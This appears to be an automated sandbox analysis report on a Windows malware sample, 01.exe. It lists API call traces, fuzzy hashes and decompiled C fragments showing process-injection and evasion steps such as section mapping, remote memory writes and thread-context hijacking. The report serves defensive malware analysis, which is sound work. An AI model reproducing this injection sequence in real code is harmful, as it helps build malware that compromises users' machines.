    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

General

Root Process Name:d3d8sext.exe
Process MD5:39E01E2F5A5FBFECA5ABC01131E7E3A1
Total matches:140
Initial Analysis Report:Open
Initial sample Analysis ID:63143
Initial sample SHA 256:9F7B02032349637F0D8C962DAB2F08F0E3269C295AC0DE385C60274E89390D4B
Initial sample name:01.exe

Similar Executed Functions

Similarity
  • Total matches: 38
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID: pnls
  • API String ID: 82859500-141991303
  • Opcode ID: 0e930324d983736687636c65484061bdc5c26c6a22796dc9d5b5e2d04a25d73d
  • Instruction ID: 4054d890b24571a5ce529a27dba078d21a52d3d947ce336da07b5894b94e827b
  • Opcode Fuzzy Hash: 7821C045058D4286DDE3B8960613F97E142FF43F88C9CFBA4B49A6669F0E04311AEB4F
  • Instruction Fuzzy Hash: 4054d890b24571a5ce529a27dba078d21a52d3d947ce336da07b5894b94e827b
APIs
    • Part of subcall function 01B3278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
    • Part of subcall function 01B3278F: memset.NTDLL ref: 01B3280F
    • Part of subcall function 01B3278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
    • Part of subcall function 01B3278F: NtClose.NTDLL(?), ref: 01B3283F
  • memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
  • memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31B66: GetModuleHandleA.KERNEL32(01B380DB,?,CCCCFEEB,01B31E8C,?,?,?,00000000), ref: 01B31B99
    • Part of subcall function 01B31B66: memcpy.NTDLL(?,3!?w,00000018,01B3845C,01B38400,01B38451), ref: 01B31C04
  • memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B339A5: memset.NTDLL ref: 01B339C4
    • Part of subcall function 01B31C13: memcpy.NTDLL(CCCCFEEB,01B37478,00000018,CCCCFEEB,01B3845C,CCCCFEEB,01B38400,CCCCFEEB,01B38451,CCCCFEEB,01B31E84,?,01B323F9,?,?,00000000), ref: 01B31CA4
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
  • CloseHandle.KERNEL32(00000000), ref: 01B31EE0
  • memset.NTDLL ref: 01B31EF4
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
    • Part of subcall function 01B3284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 01B328AE
    • Part of subcall function 01B3284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 01B328C3
    • Part of subcall function 01B3284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 01B32905
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 57d5b69842fa9f20cc0ac7374aaf72f9f3e4042206c472131978e9752df15512
  • Instruction ID: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
  • Opcode Fuzzy Hash: 09F078400B9F90E6E812A68604A2F406692FF06E75E0EE32475F211B8A3F12311D8B06
  • Instruction Fuzzy Hash: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
APIs
  • memset.NTDLL ref: 01B338A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 01B33995
    • Part of subcall function 01B33E68: NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
    • Part of subcall function 01B33E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
    • Part of subcall function 01B33E68: SetLastError.KERNEL32(00000000), ref: 01B33EA7
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
  • memcpy.NTDLL(00000218,01B34F92,00000100,?,00010003,?,?,00000318,00000008), ref: 01B3391D
    • Part of subcall function 01B33E27: NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
    • Part of subcall function 01B33E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
    • Part of subcall function 01B33E27: SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 01B33974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33977
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 09b8888f5fea2438ba07c33a5d99fafd9b808ca60c6c542fde1a50af119b8c2c
  • Instruction ID: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
  • Opcode Fuzzy Hash: 42C012800D5D81E6957F54890169A165197BB91600C3D73363184AD5807FA032190F09
  • Instruction Fuzzy Hash: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
APIs
  • NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
  • SetLastError.KERNEL32(00000000), ref: 01B33EA7
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: 153371e7e4f27683f8f1e7324a073917f20e70acda51c493c57c8daf0af629c8
  • Instruction ID: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
  • Opcode Fuzzy Hash: 09C09BC7021DC54DD779698201B5C45C1C57EB177243C710D5054DD31D518931274E85
  • Instruction Fuzzy Hash: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
  • SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 36b500c4af3d78682ecbfd6e0cb23a776f8586d0295add1c103b4d2a2a554bea
  • Instruction ID: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
  • Opcode Fuzzy Hash: 9EC09B87020DC54DD779694101B9C45C0C57FB177243C710D5058DD31D518931274F85
  • Instruction Fuzzy Hash: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
  • SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
